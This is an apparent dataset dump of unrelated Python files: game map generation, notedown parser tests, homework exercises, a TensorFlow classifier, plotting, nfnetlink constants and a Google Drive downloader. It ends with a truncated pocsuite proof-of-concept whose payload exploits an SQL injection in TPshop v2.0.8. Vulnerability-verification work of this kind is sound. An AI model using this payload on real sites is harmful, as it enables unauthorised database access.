time.sleep(2)","sub_path":"风变编程/python爬虫-山腰班/fb_10/fb_09.py","file_name":"fb_09.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587547661","text":"import random\nimport json\n\nfrom cls.city import City\nfrom cls.tile import Tile\nfrom cls.map import Map\n\n\n\ndef get_random_map(map_layout_json):\n tiles = get_random_tiles(map_layout_json)\n cities = get_random_cities(tiles)\n\n #make lists\n tiles = list(tiles.values())\n cities = list(cities.values())\n\n map = Map(cities, tiles)\n\n return map\n\n\ndef get_random_cities(tiles, city_layout_json = \"map_generation/info/cities.json\"):\n with open(city_layout_json, \"r\") as f:\n city_layout = json.load(f)\n\n cities = {}\n for pos, tiles_idx in city_layout.items():\n tmptiles = [tiles[i] for i in tiles_idx if i in tiles.keys()]\n if len(tmptiles) != 0:\n name = \"_\".join([str(v) for v in tiles_idx])\n cities[name] = City(pos, tmptiles)\n\n return cities\n\ndef get_random_tiles(map_layout_json):\n with open(map_layout_json, \"r\") as f:\n map_layout = json.load(f)\n\n #get lists of dice values, and resources\n dice_values = get_dice_values_list()\n resources = get_resource_list()\n\n\n\n assert len(map_layout) == 44\n assert len(resources) == 25\n assert len(dice_values) == 25\n\n\n #shuffle them to make a random map\n random.shuffle(dice_values)\n random.shuffle(resources)\n\n tiles = {}\n gold_dice_values = [3, 11]\n for position, tile_type in map_layout.items():\n position = int(position)\n\n if tile_type == \"random\":\n res = resources.pop()\n dval = int(dice_values.pop())\n\n t = Tile(position, res, dval)\n tiles[position] = t\n\n elif tile_type == \"gold\":\n dval = gold_dice_values.pop()\n res = \"gold\"\n\n t = Tile(position, res, dval)\n tiles[position] = t\n\n elif tile_type == \"water\":\n t = Tile(position, resource = \"water\", dice_value = None)\n tiles[position] = t\n\n\n return tiles\n\n\n#helper functions\ndef get_dice_values_list():\n with open(\"map_generation/info/dice_values.json\", \"r\") as f:\n dice_dict = json.load(f)\n\n dice_list = []\n for key in dice_dict:\n if key != \"gold\":\n dice_list += [int(key)]*dice_dict[key]\n\n count = {i: dice_list.count(str(i)) for i in range(2, 13)}\n\n return dice_list\n\ndef get_resource_list():\n with open(\"map_generation/info/resources.json\", \"r\") as f:\n tiles_dict = json.load(f)\n\n tile_list = []\n for key in tiles_dict:\n if key != \"gold\":\n tile_list += [key]*tiles_dict[key]\n\n return tile_list\n","sub_path":"map_generation/generate_map.py","file_name":"generate_map.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460110122","text":"import notedown\n\nsimple_backtick = \"\"\"\n```\ncode1\n space_indent\n```\ntext1\n``\n\n```\ncode2\n\ttab_indent\n~~~\n```\n\ntext2\"\"\"\n\nsimple_tilde = \"\"\"\n~~~\ncode1\n space_indent\n~~~\ntext1\n``\n\n~~~~\ncode2\n\ttab_indent\n~~~\n~~~~\n\ntext2\"\"\"\n\nsimple_indented = \"\"\"\n code1\n space_indent\n\ntext1\n``\n\tcode2\n\t\ttab_indent\n\t~~~\n\ntext2\"\"\"\n\nsimple_code_cells = ['code1\\n space_indent', 'code2\\n\ttab_indent\\n~~~']\nsimple_markdown_cells = ['text1\\n``', 'text2']\n\nalt_lang = \"\"\"\nThis is how you write a code block in another language:\n\n```bash\necho \"This is bash ${BASH_VERSION}!\"\n```\n\"\"\"\n\nalt_lang_code = '%%bash\\necho \"This is bash ${BASH_VERSION}!\"'\n\n\nsample_markdown = 
u\"\"\"### Create IPython Notebooks from markdown\n\nThis is a simple tool to convert markdown with code into an IPython\nNotebook.\n\nUsage:\n\n```\nnotedown input.md > output.ipynb\n```\n\n\nIt is really simple and separates your markdown into code and not\ncode. Code goes into code cells, not-code goes into markdown cells.\n\nInstallation:\n\n pip install notedown\n\"\"\"\n\n# Generate the sample notebook from the markdown using\n#\n# import notedown\n# reader = notedown.MarkdownReader()\n# sample_notebook = reader.reads(sample_markdown)\n# writer = notedown.JSONWriter()\n# print writer.writes(sample_notebook)\n#\nsample_notebook = r\"\"\"{\n \"metadata\": {},\n \"nbformat\": 3,\n \"nbformat_minor\": 0,\n \"worksheets\": [\n {\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Create IPython Notebooks from markdown\\n\",\n \"\\n\",\n \"This is a simple tool to convert markdown with code into an IPython\\n\",\n \"Notebook.\\n\",\n \"\\n\",\n \"Usage:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"collapsed\": false,\n \"input\": [\n \"notedown input.md > output.ipynb\"\n ],\n \"language\": \"python\",\n \"metadata\": {},\n \"outputs\": []\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"It is really simple and separates your markdown into code and not\\n\",\n \"code. Code goes into code cells, not-code goes into markdown cells.\\n\",\n \"\\n\",\n \"Installation:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"collapsed\": false,\n \"input\": [\n \"pip install notedown\"\n ],\n \"language\": \"python\",\n \"metadata\": {},\n \"outputs\": []\n }\n ],\n \"metadata\": {}\n }\n ]\n}\"\"\"\n\n\ndef create_json_notebook():\n reader = notedown.MarkdownReader()\n writer = notedown.JSONWriter()\n\n notebook = reader.reads(sample_markdown)\n json_notebook = writer.writes(notebook)\n return json_notebook\n\n\ndef test_notedown():\n \"\"\"Integration test the whole thing.\"\"\"\n assert(create_json_notebook() == sample_notebook)\n\n\ndef parse_cells(text, regex):\n reader = notedown.MarkdownReader(code_regex=regex)\n return reader.parse_blocks(text)\n\n\ndef separate_code_cells(cells):\n codetype = notedown.MarkdownReader.code\n code_cells = [c['content'] for c in cells if c['type'] == codetype]\n return code_cells\n\n\ndef separate_markdown_cells(cells):\n markdowntype = notedown.MarkdownReader.markdown\n markdown_cells = [c['content'] for c in cells if c['type'] == markdowntype]\n return markdown_cells\n\n\ndef test_parse_gfm():\n \"\"\"Test with GFM code blocks.\"\"\"\n all_cells = parse_cells(simple_backtick, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_parse_tilde():\n \"\"\"Test with ~~~ delimited code blocks.\"\"\"\n all_cells = parse_cells(simple_tilde, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_parse_indented():\n \"\"\"Test with indented code blocks.\"\"\"\n all_cells = parse_cells(simple_indented, 'indented')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_alt_lang():\n \"\"\"Specifying a language that isn't python 
should generate\n code blocks using %%language magic.\"\"\"\n all_cells = parse_cells(alt_lang, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n\n assert(code_cells[0] == alt_lang_code)\n\n\ndef test_format_agnostic():\n \"\"\"Test whether we can process markdown with either fenced or\n indented blocks.\"\"\"\n fenced_cells = parse_cells(simple_backtick, None)\n indented_cells = parse_cells(simple_indented, None)\n\n fenced_code_cells = separate_code_cells(fenced_cells)\n indented_code_cells = separate_code_cells(indented_cells)\n\n fenced_markdown_cells = separate_markdown_cells(fenced_cells)\n indented_markdown_cells = separate_markdown_cells(indented_cells)\n\n assert(fenced_code_cells == indented_code_cells)\n assert(fenced_markdown_cells == indented_markdown_cells)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282632912","text":"#题目:求s=a+aa+aaa+aaaa+aa...a的值,其中a是一个数字。\n# 例如2+22+222+2222+22222(此时共有5个数相加),几个数相加有键盘控制。\n#程序分析:关键是计算出每一项的值。\ndef suma(a,n):\n sum = 0\n for i in range(1,n+1):\n def num(i):\n if i == 1:\n return a\n else:\n return (num(i-1) + (a * (10**(i-1))))\n sum = sum + num(i)\n return sum\nprint(suma(2,3))","sub_path":"test/test18.py","file_name":"test18.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211371973","text":"# Проанализировать скорость и сложность одного любого алгоритма из разработанных\n# в рамках домашнего задания первых трех уроков. \n\n\n# В массиве найти максимальный отрицательный элемент. Вывести на экран его значение и позицию в массиве.\n\nimport random\n\n# Вариант с одним циклом\ndef amax1(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n \n i = 0\n amax = -1\n\n while i < n:\n if a[i] < 0 and amax == -1:\n amax = i\n elif a[i] < 0 and a[i] > a[amax]:\n amax = i\n \n i += 1\n \n return a[amax], amax\n \n# Вариант с 2мя циклами\ndef amax2(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n\n amax = 0\n\n while True:\n if a[amax] > 0:\n amax += 1\n else:\n break\n\n for i in range(1, len(a)):\n if a[amax] < a[i] and a[i] < 0:\n amax = i\n \n return a[amax], amax\n\n# Вариант с двумя циклами, промежуточным списком и функцией max\ndef amax3(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n \n i = 0\n b = []\n amax = 0\n\n while i < n:\n if a[i] < 0:\n b.append(a[i])\n \n i += 1\n \n bmax = max(b)\n \n for i in range(0, len(a)):\n if a[i] == bmax:\n amax = i\n \n return bmax, amax\n\n#В результате проверки быстродействия на массивах размером от 50 до 500 с шагом в 50\n#оказалось что вариант с двумя циклами оказался быстрее, так как первый цикл\n#ороткий, а во втором проверяется одно условие в отличие от варианта с одним циклом, \n#но с двумя условиями в нем. Вариант с двумя циклами и промежуточным массивом и функцией max\n#оказался самым медленным, но незначительно. 
Судя по графику сложность алгоритма относится к постоянной.\n\nimport matplotlib.pyplot as plt\n\na = [89, 169, 243, 329, 410, 498, 558, 647, 742, 799]\nb = [87, 157, 234, 313, 384, 459, 549, 602, 677, 779]\nc = [90, 166, 253, 331, 416, 492, 567, 679, 740, 808]\n\nplt.plot(a, label='с одним циклом')\nplt.plot(b, label='с 2мя циклами')\nplt.plot(c, label='с двумя циклами и ф-ей max')\nplt.legend()\nplt.show()\n\n# Вариант с одним циклом\n# \"import task_1\" \"task_1.amax1(50)\"\n# 1000 loops, best of 5: 88.9 usec per loop\n\n# \"import task_1\" \"task_1.amax1(100)\"\n# 1000 loops, best of 5: 169 usec per loop\n\n# \"import task_1\" \"task_1.amax1(150)\"\n# 1000 loops, best of 5: 243 usec per loop\n\n# \"import task_1\" \"task_1.amax1(200)\"\n# 1000 loops, best of 5: 329 usec per loop\n\n# \"import task_1\" \"task_1.amax1(250)\"\n# 1000 loops, best of 5: 410 usec per loop\n\n# \"import task_1\" \"task_1.amax1(300)\"\n# 1000 loops, best of 5: 498 usec per loop\n\n# \"import task_1\" \"task_1.amax1(350)\"\n# 1000 loops, best of 5: 558 usec per loop\n\n# \"import task_1\" \"task_1.amax1(400)\"\n# 1000 loops, best of 5: 647 usec per loop\n\n# \"import task_1\" \"task_1.amax1(450)\"\n# 1000 loops, best of 5: 742 usec per loop\n\n# \"import task_1\" \"task_1.amax1(500)\"\n# 1000 loops, best of 5: 799 usec per loop\n\n\n# Вариант с 2мя циклами\n# \"import task_1\" \"task_1.amax2(50)\"\n# 1000 loops, best of 5: 86.6 usec per loop\n\n# \"import task_1\" \"task_1.amax2(100)\"\n# 1000 loops, best of 5: 157 usec per loop\n\n# \"import task_1\" \"task_1.amax2(150)\"\n# 1000 loops, best of 5: 234 usec per loop\n\n# \"import task_1\" \"task_1.amax2(200)\"\n# 1000 loops, best of 5: 313 usec per loop\n\n# \"import task_1\" \"task_1.amax2(250)\"\n# 1000 loops, best of 5: 384 usec per loop\n\n# \"import task_1\" \"task_1.amax2(300)\"\n# 1000 loops, best of 5: 459 usec per loop\n\n# \"import task_1\" \"task_1.amax2(350)\"\n# 1000 loops, best of 5: 549 usec per loop\n\n# \"import task_1\" \"task_1.amax2(400)\"\n# 1000 loops, best of 5: 602 usec per loop\n\n# \"import task_1\" \"task_1.amax2(450)\"\n# 1000 loops, best of 5: 677 usec per loop\n\n# \"import task_1\" \"task_1.amax2(500)\"\n# 1000 loops, best of 5: 779 usec per loop\n\n\n# Вариант с двумя циклами, промежуточным списком и функцией max\n# \"import task_1\" \"task_1.amax3(50)\"\n# 1000 loops, best of 5: 90 usec per loop\n\n# \"import task_1\" \"task_1.amax3(100)\"\n# 1000 loops, best of 5: 166 usec per loop\n\n# \"import task_1\" \"task_1.amax3(150)\"\n# 1000 loops, best of 5: 253 usec per loop\n\n# \"import task_1\" \"task_1.amax3(200)\"\n# 1000 loops, best of 5: 331 usec per loop\n\n# \"import task_1\" \"task_1.amax3(250)\"\n# 1000 loops, best of 5: 416 usec per loop\n\n# \"import task_1\" \"task_1.amax3(300)\"\n# 1000 loops, best of 5: 492 usec per loop\n\n# \"import task_1\" \"task_1.amax3(350)\"\n# 1000 loops, best of 5: 567 usec per loop\n\n# \"import task_1\" \"task_1.amax3(400)\"\n# 1000 loops, best of 5: 679 usec per loop\n\n# \"import task_1\" \"task_1.amax3(450)\"\n# 1000 loops, best of 5: 740 usec per loop\n\n# \"import task_1\" \"task_1.amax3(500)\"\n# 1000 loops, best of 5: 808 usec per loop\n\n\n","sub_path":"Python_algorithm_4/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619220639","text":"import sklearn as skl\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as 
plt\n\n\ndef load_data():\n dataset = pd.read_csv('data.csv', usecols=['combined_shot_type', 'seconds_remaining', 'shot_distance',\n 'playoffs', 'shot_zone_range', 'shot_zone_area', 'shot_made_flag'])\n return dataset\n\n\ndef convert2onehot(d2onehot):\n # covert data to onehot representation\n return pd.get_dummies(d2onehot)\n\n\n# data_df = load_data().dropna()\n# data_df['shot_fail_flag'] = 1-data_df.loc[:, 'shot_made_flag']\n# # print(data_df.head(5))\n# data = convert2onehot(data_df)\n# print('Onehot data:\\n', data[:5])\n# print(\"Num of data:\\n \", data.shape, \"\\n\")\n# for name in data_df.keys():\n# print(name, pd.unique(data_df[name]))\n\n# Preprocessing & separate training sets\nx_ = np.load('../data/soil_pca_plant_3600x88.npy')\ny_ = np.load('../data/label.npy')[:3600]\ny_ = convert2onehot(y_)\nprint('x:', x_.shape)\nprint('y:', y_.shape)\n\nshuffle = np.hstack((y_, x_)).copy()\n# print('before shuffle:', b4shuffle)\nnp.random.shuffle(shuffle) # shuffle\n# print('after shuffle:', b4shuffle.shape)\n# print(b4shuffle)\n# 4: Separate\nsep = int(0.3 * len(x_))\ntrain_x = shuffle[:sep, 4:].copy()\ntrain_y = shuffle[:sep, 0:4].copy()\ntest_x = shuffle[sep:, 4:].copy()\ntest_y = shuffle[sep:, 0:4].copy()\n\n# x_combined = np.vstack((train_x, test_x))\n# y_combined = np.vstack((train_y, test_y))\n# print(train_x[:15])\n# print(train_y[:15])\n\n\n# build network\nwith tf.variable_scope('Inputs'):\n tfx = tf.placeholder(tf.float32, [None, 82], 'Input_x')\n tfy = tf.placeholder(tf.float32, [None, 4], 'Input_y')\n\nprint('tfx shape', tfx.shape)\n\nwith tf.variable_scope('Layers'):\n l1 = tf.layers.dense(tfx, 256, tf.nn.relu, name=\"L1\") # 全连接层\n l2 = tf.layers.dense(tfx, 256, tf.nn.tanh, name=\"L2\")\n # l3 = tf.layers.dense(l2, 128, tf.nn.relu, name=\"L3\")\n # l4 = tf.layers.dense(l3, 64, tf.nn.relu, name=\"L4\")\n out = tf.layers.dense(l2, 4, tf.nn.relu, name=\"L5\")\n\nprediction = tf.nn.softmax(out, name=\"Prediction\")\n\nloss = tf.losses.softmax_cross_entropy(onehot_labels=tfy, logits=out, scope='loss')\naccuracy = tf.metrics.accuracy( # return (acc, update_op), and create 2 local variables\n labels=tf.argmax(tfy, axis=1), predictions=tf.argmax(out, axis=1),)[1]\noptima = tf.train.AdadeltaOptimizer(learning_rate=0.05)\ntrain_optima = optima.minimize(loss)\ntf.summary.scalar('Loss', loss)\n\nsess = tf.Session()\nsess.run(tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())) # accuracy is in local variable init\nwriter = tf.summary.FileWriter(\"/Users/Epilo/Documents/CodeTest/py_BigData\", sess.graph)\n\n# training\nplt.ion()\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4))\naccuracies, steps = [], []\nfor t in range(5000):\n # training\n sess.run(train_optima, feed_dict={tfx: train_x, tfy: train_y})\n\n if t % 50 == 0:\n # testing\n acc_, pred_, loss_ = sess.run([accuracy, prediction, loss], {tfx: test_x, tfy: test_y})\n accuracies.append(acc_)\n steps.append(t)\n # print(acc_.__class__)\n print(\"Step: %i\" % t, \"| ACC: %.6f\" % acc_, \"| Loss: %.6f\" % (loss_*10000))\n\n # visualize testing\n # ax1.cla()\n # for c in range(3):\n # bp = ax1.bar(c+0.1, height=sum((np.argmax(pred_, axis=1) == c)),\n # width=0.2, color='red')\n # bt = ax1.bar(c-0.1, height=sum((np.argmax(test_y, axis=1) == c)),\n # width=0.2, color='blue')\n # ax1.set_xticks(range(2), ['success', 'failure'])\n # ax1.legend(handles=[bp, bt], labels=[\"prediction\", \"target\"])\n # ax1.set_ylim((0, 20000))\n # ax2.cla()\n # ax2.plot(steps, accuracies, label=\"accuracy\")\n # 
ax2.set_ylim(ymax=0.8)\n # ax2.set_ylabel(\"accuracy\")\n # plt.pause(0.01)\n#\n# plt.ioff()\n# plt.show()\n\nprint(1)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"116787332","text":"#!/usr/bin/python\n\nimport numpy, matplotlib, matplotlib.colors, matplotlib.pyplot, gzip\nimport matplotlib.gridspec\nimport matplotlib.patches as patches\n\nimport sys\n\ndef anint(x):\n x1=numpy.floor(x)\n x2=x1+1.0\n if (x2-x)<(x-x1):\n return int(x2)\n else:\n return int(x1)\n\n## regions for SS types\nphi_alpha_1=-122\nphi_alpha_2=-52\npsi_alpha_1=-84\npsi_alpha_2=-14\n#edit to accomodate more residues eg. 16-22 = 6\n#rama=numpy.zeros((6,360,360))\nrama=numpy.zeros((39,360,360))\n\ninf=open(sys.argv[1],'r')\nnRes=int(sys.argv[3])\nnPB=nRes-2\n\nwhile 1:\n line=inf.readline()\n #print line\n if line[0]=='@':\n continue\n if line[0]=='#':\n continue\n break\n\nnorm=0\nfinished=False\nwhile 1:\n #print norm\n for ires in range(nPB):\n line=inf.readline()[:-1]\n if line=='':\n \tfinished=True\n \tbreak\n if len(line)==0:\n \tfinished=True\n \tbreak\n norm+=1\n data=line.split()\n if len(data)<2:\n \tfinished=True\n \tbreak\n (phi,psi)=(float(data[0]),float(data[1]))\n iPhi=anint(phi)+180\n if iPhi==360:\n iPhi=0\n iPsi=anint(psi)+180\n if iPsi==360:\n iPsi=0\n rama[ires,iPsi,iPhi]+=1.0\n if finished:\n \tbreak\n\nfor ires in range(nPB):\n## normalise\n fig=matplotlib.pyplot.figure(figsize=(10,8))\n cs=matplotlib.pyplot.contourf([float(iPsi) for iPsi in range(-180,180)],[float(iPhi) for iPhi in range(-180,180)],rama[ires,:,:]\n ,[0,10,20,30,40,50,60],extend='both')\n ca=matplotlib.pyplot.gca()\n ca.add_patch(patches.Rectangle((-122,-84),70,70,fill=False))\n ca.add_patch(patches.Rectangle((-150,95),80,80,fill=False))\n ca.add_patch(patches.Rectangle((14,52),70,70,fill=False))\n ca.add_patch(patches.Rectangle((-180,50),130,130,fill=False))\n ca.add_patch(patches.Rectangle((150,50),30,130,fill=False))\n ca.add_patch(patches.Rectangle((-180,-180),130,30,fill=False))\n cb=matplotlib.pyplot.colorbar()\n\n font = {'family': 'serif',\n 'color': 'darkred',\n 'size': 24,\n }\n\n #matplotlib.pyplot.title('Abeta16-22 in AWI', fontdict=font)\n matplotlib.pyplot.xlabel('Phi',fontdict=font)\n matplotlib.pyplot.xticks([-180,-90,0,90,180],['-180','-90','0','90','180'],size=16)\n matplotlib.pyplot.ylabel('Psi',fontdict=font)\n matplotlib.pyplot.yticks([-180,-90,0,90,180],['-180','-90','0','90','180'],size=16)\n\n#cb=matplotlib.pyplot.colorbar()\n savefile=sys.argv[2] + str(ires)\n fig.savefig(savefile)\n #fig.show()\n","sub_path":"rama/plot_rama-residue.py","file_name":"plot_rama-residue.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378833655","text":"import struct\nfrom pymnl.message import NLMSG_MIN_TYPE, NLMSG_ALIGN\n\nfrom socket import (\n IPPROTO_TCP,\n IPPROTO_UDP,\n IPPROTO_ICMP,\n IPPROTO_ICMPV6\n)\n\nIPPROTO_DCCP = 33 # Datagram Congestion Control Protocol\nIPPROTO_GRE = 47 # Cisco GRE tunnels (rfc 1701,1702)\nIPPROTO_SCTP = 132 # Stream Control Transport Protocol\nIPPROTO_UDPLITE = 136 # UDP-Lite (RFC 3828)\n\n# General form of address family dependent message.\nNFNL_HDRFMT = 'BBH'\nNFNL_HDRLEN = NLMSG_ALIGN(struct.calcsize(NFNL_HDRFMT))\n\n# Reserved control nfnetlink messages\nNFNL_MSG_BATCH_BEGIN = NLMSG_MIN_TYPE\nNFNL_MSG_BATCH_END = NLMSG_MIN_TYPE + 1\n\n# 
nfnetlink_groups\nNFNLGRP_NONE = 0x0\nNFNLGRP_CONNTRACK_NEW = 0x1\nNFNLGRP_CONNTRACK_UPDATE = 0x2\nNFNLGRP_CONNTRACK_DESTROY = 0x3\nNFNLGRP_CONNTRACK_EXP_NEW = 0x4\nNFNLGRP_CONNTRACK_EXP_UPDATE = 0x5\nNFNLGRP_CONNTRACK_EXP_DESTROY = 0x6\nNFNLGRP_NFTABLES = 0x7\n\nNFNL_SUBSYS_NONE = 0\nNFNL_SUBSYS_CTNETLINK = 1\nNFNL_SUBSYS_CTNETLINK_EXP = 2\nNFNL_SUBSYS_QUEUE = 3\nNFNL_SUBSYS_ULOG = 4\nNFNL_SUBSYS_OSF = 5\nNFNL_SUBSYS_IPSET = 6\nNFNL_SUBSYS_ACCT = 7\nNFNL_SUBSYS_CTNETLINK_TIMEOUT = 8\nNFNL_SUBSYS_CTHELPER = 9\nNFNL_SUBSYS_NFTABLES = 10\nNFNL_SUBSYS_NFT_COMPAT = 11\nNFNL_SUBSYS_COUNT = 12\n\nNF_NETLINK_CONNTRACK_NEW = 0x00000001\nNF_NETLINK_CONNTRACK_UPDATE = 0x00000002\nNF_NETLINK_CONNTRACK_DESTROY = 0x00000004\nNF_NETLINK_CONNTRACK_EXP_NEW = 0x00000008\nNF_NETLINK_CONNTRACK_EXP_UPDATE = 0x00000010\nNF_NETLINK_CONNTRACK_EXP_DESTROY = 0x00000020\n\nNFNETLINK_V0 = 0\n\n# netfilter netlink message types are split in two pieces: 8 bit subsystem, 8bit operation.\ndef NFNL_SUBSYS_ID(x):\n return ((x & 0xff00) >> 8)\n\ndef NFNL_MSG_TYPE(x):\n return (x & 0x00ff)","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376694926","text":"\n\n#calss header\nclass _HERALD():\n\tdef __init__(self,): \n\t\tself.name = \"HERALD\"\n\t\tself.definitions = [u'a sign that something will happen, change, etc.: ', u'in the past, a person who carried important messages and made announcements']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_herald.py","file_name":"_herald.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42758029","text":"#This module downloads files from a shared google drive folder\n\n# !/usr/bin/python\nfrom __future__ import print_function\n\nimport os\n#import os.path\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport requests\nimport six\nimport tqdm\n\n\ndef download_file_from_google_drive(id, destination, URL):\n session = requests.Session()\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n \n #if not os.path.isfile(destination):\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n \n \ndef check_nature(destination):\n myFile=open(destination)\n contents=myFile.read()\n myFile.close()\n for i,line in enumerate(contents.splitlines()):\n i=i+1\n if i> 9:\n return False\n return True\n \ndef is_drive_folder(source):\n statinfo = os.stat(source)\n if statinfo.st_size > 141:\n return False\n return True\n \ndef id_extractor(source,id_list):\n myFile=open(source, \"r\")\n contents=myFile.read()\n myFile.close() \n lines=contents.splitlines() \n for line in lines:\n #iterate for each found item\n for m in 
re.finditer(r\"\\\\x5b\\\\x22\", line): #look for a pattern that comes before the id of the url \n #get the id of the item\n item_id=line[m.end():m.end()+33]\n #get the name of the item\n n=re.search(r\"\\\\x22\\\\x5d\\\\n,\\\\x22\", line[m.end():]) \n if n!= None:\n o=re.search(r\"\\\\x22,\\\\x22\", line[m.end()+n.end():])\n if o!= None:\n item_name=line[m.end()+n.end():m.end()+n.end()+o.start()] \n flag=False\n for iterator in id_list:\n if item_name in iterator:\n flag=True\n if not flag:\n id_list.append([item_name,item_id])\n \nif __name__ == '__main__':\n if len(sys.argv) < 2: \n item_id=input(\"The id for the main folder ?\")\n elif(sys.argv) == 2: \n item_id=sys.argv[1] \n else: \n #sortie avec code d'erreur different de 0\n item_id='' #one needs to select drive folder ID Here\n sys.exit(10)\n \n count=0\n liste=[]\n identifiers=[]\n # create the session\n session = requests.Session()\n #set the first item which is url for the base folder\n if not os.path.isfile(\"dat.txt\"):\n myFile= open(\"dat.txt\",\"w+\")\n myFile.write(\"%s;/;\"% \"base folder.temp\")\n myFile.write(\"%s\\n\"% item_id)\n myFile.close() \n \n myFile= open(\"dat.txt\",\"r\")\n content=myFile.read()\n myFile.close()\n \n lines=content.splitlines() \n for line in lines:\n item=line.split(\";/;\")\n liste.append(item)\n \n while count < len(liste): \n item_id=liste[count][1] \n destination=liste[count][0]\n #set the link type then dowload the file/folder\n URL = 'https://docs.google.com/uc?export=download' # or \"https://drive.google.com/uc?export=download\" to download\n \t\n print('Downloading file',destination)\n download_file_from_google_drive(item_id, destination, URL)\n \n if is_drive_folder(destination):\n URL = 'https://drive.google.com/open?' \n download_file_from_google_drive(item_id, destination, URL)\n \n id_extractor(destination,liste)\n os.remove(destination)\n print(\"File \",destination,\" Removed!\") \n destination = liste[count][0] #'image'+str(count)+'.jpg' \n count=count+1 \n f= open(\"dat.txt\",\"w+\")\n for element in liste:\n f.write(\"%s;/;\"% element[0])\n f.write(\"%s\\n\"% element[1])\n f.close() \n\n","sub_path":"file_download_using_requests.py","file_name":"file_download_using_requests.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427435454","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport string\nimport random\nimport time\nimport re\nfrom pocsuite.net import req\nfrom pocsuite.poc import POCBase, Output\nfrom pocsuite.utils import register\n\n\nclass TestPOC(POCBase):\n name = 'TPshopv2.0.8 sql injection Vulnerability'\n vulID = '0'\n author = ['cws6']\n vulType = 'sql-inj'\n version = '1'\n references = ['https://www.bodkin.ren/index.php/archives/244/']\n desc = '''tpshopv2.0.8 /application/home/controller/Goods.php存在order by sql注入'''\n\n vulDate = '2018-01-27'\n createDate = '2019-04-16'\n updateDate = '2019-04-16'\n\n appName = 'TPshop'\n appVersion = 'v2.0.8'\n appPowerLink = 'http://www.tp-shop.cn'\n samples = ['re']\n\n \n def _attack(self):\n \"\"\"attack mode\"\"\"\n result = {}\n payload1 = '/index.php/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(select count(*) from information_schema.columns group by concat(0x7e,(select database()),0x7e,floor(rand()*2)))' \n while True:\n resp = req.get(self.url + payload1)\n dbname1 = re.findall(\"~(.*?)~\", resp.content)\n time.sleep(2)\n if dbname1:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = 
